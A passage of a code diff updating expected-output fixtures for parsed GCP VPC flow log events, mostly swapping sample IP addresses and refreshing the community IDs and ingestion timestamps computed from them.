"{\"insertId\":\"y4wffpfk2eroy\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":57300},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:48:22.044604322Z", "end": "2019-06-14T03:48:22.156322353Z", @@ -10146,9 +10146,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 54662, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -10162,7 +10162,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:jQRBIxNHMzfkP/qDqSMZJb7cjWg=", + "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", "bytes": 1776, "transport": "tcp", "type": "ipv4", @@ -10177,7 +10177,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { 
@@ -10201,8 +10201,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868799Z", - "original": "{\"insertId\":\"y4wffpfk2erof\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":54662,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391715300Z", + "original": 
"{\"insertId\":\"y4wffpfk2erof\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":54662,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:45:12.027895189Z", "end": "2019-06-14T03:45:12.142682672Z", @@ -10229,18 +10229,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33572, "bytes": 11674, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 96 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:vae84XmwYYRVAple470fSnJPul0=", + "community_id": "1:yNQZdh5JH2wK9uzpK/mTdNYogpE=", "bytes": 11674, "name": "default", "transport": "tcp", @@ -10262,7 +10262,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -10299,8 +10299,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868802200Z", - "original": "{\"insertId\":\"y4wffpfk2erov\",\"jsonPayload\":{\"bytes_sent\":\"11674\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391719Z", + "original": 
"{\"insertId\":\"y4wffpfk2erov\",\"jsonPayload\":{\"bytes_sent\":\"11674\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470754779Z", "end": "2019-06-14T03:49:51.821056075Z", @@ -10327,18 +10327,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33540, "bytes": 62831, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 346 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:MQOhdELEvqJXellZlJ8csNiAoAM=", + "community_id": "1:F/7D/X852gHR0MKQ6f237loatS0=", "bytes": 62831, "name": "default", "transport": "tcp", @@ -10360,7 +10360,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -10397,8 +10397,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868805300Z", - "original": "{\"insertId\":\"y4wffpfk2erop\",\"jsonPayload\":{\"bytes_sent\":\"62831\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"346\",\"reporter\":\"DEST\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391723500Z", + "original": 
"{\"insertId\":\"y4wffpfk2erop\",\"jsonPayload\":{\"bytes_sent\":\"62831\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"346\",\"reporter\":\"DEST\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074813982Z", "end": "2019-06-14T03:49:51.789112562Z", @@ -10419,10 +10419,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -10436,7 +10436,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:UPRJyBawh4JbZzzvBFfenzP0Yco=", + "community_id": "1:yy2U6IJ6o+0ezyD0HfX5dcSPTyA=", "bytes": 15169, "name": "default", "transport": "tcp", @@ -10459,7 +10459,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -10495,8 +10495,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868808400Z", - "original": "{\"insertId\":\"y4wffpfk2erou\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33574},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"93\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391727600Z", + "original": 
"{\"insertId\":\"y4wffpfk2erou\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33574},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"93\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466811088Z", "end": "2019-06-14T03:49:51.821291282Z", @@ -10523,17 +10523,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 54662, "bytes": 1464, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:jQRBIxNHMzfkP/qDqSMZJb7cjWg=", + "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -10547,7 +10547,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -10572,8 +10572,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868811400Z", - "original": "{\"insertId\":\"y4wffpfk2eroj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":54662},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391731300Z", + "original": 
"{\"insertId\":\"y4wffpfk2eroj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":54662},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:45:12.027895189Z", "end": "2019-06-14T03:45:12.142682672Z", @@ -10594,10 +10594,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -10611,7 +10611,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:daatd5jK/QqBAjEYb64ySmXIcOU=", + "community_id": "1:VbVjklGBQiIYWy94d7CXlQ+ISxo=", "bytes": 64588, "name": "default", "transport": "tcp", @@ -10634,7 +10634,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -10670,8 +10670,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868814600Z", - "original": "{\"insertId\":\"y4wffpfk2erow\",\"jsonPayload\":{\"bytes_sent\":\"64588\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391735300Z", + "original": 
"{\"insertId\":\"y4wffpfk2erow\",\"jsonPayload\":{\"bytes_sent\":\"64588\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075859688Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -10698,18 +10698,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33536, "bytes": 67315, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 354 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:c/u5Mg/PGR6riBWo0YXGpZWs3cI=", + "community_id": "1:LeOPi08ubqTh6aNT93e8m/GSF+Y=", "bytes": 67315, "name": "default", "transport": "tcp", @@ -10731,7 +10731,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -10768,8 +10768,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868817700Z", - "original": "{\"insertId\":\"y4wffpfk2erot\",\"jsonPayload\":{\"bytes_sent\":\"67315\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391738600Z", + "original": 
"{\"insertId\":\"y4wffpfk2erot\",\"jsonPayload\":{\"bytes_sent\":\"67315\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150481417Z", "end": "2019-06-14T03:49:59.565156020Z", @@ -10796,18 +10796,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 175633, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 67 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:8dEsdSCqyZDg8ZlrEARjkF61tVk=", + "community_id": "1:8HPuUT0Nn+eIY1y5PdvmF0aw60A=", "bytes": 175633, "name": "default", "transport": "tcp", @@ -10829,7 +10829,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -10866,8 +10866,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868821700Z", - "original": "{\"insertId\":\"y4wffpfk2eroq\",\"jsonPayload\":{\"bytes_sent\":\"175633\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"67\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391743Z", + "original": 
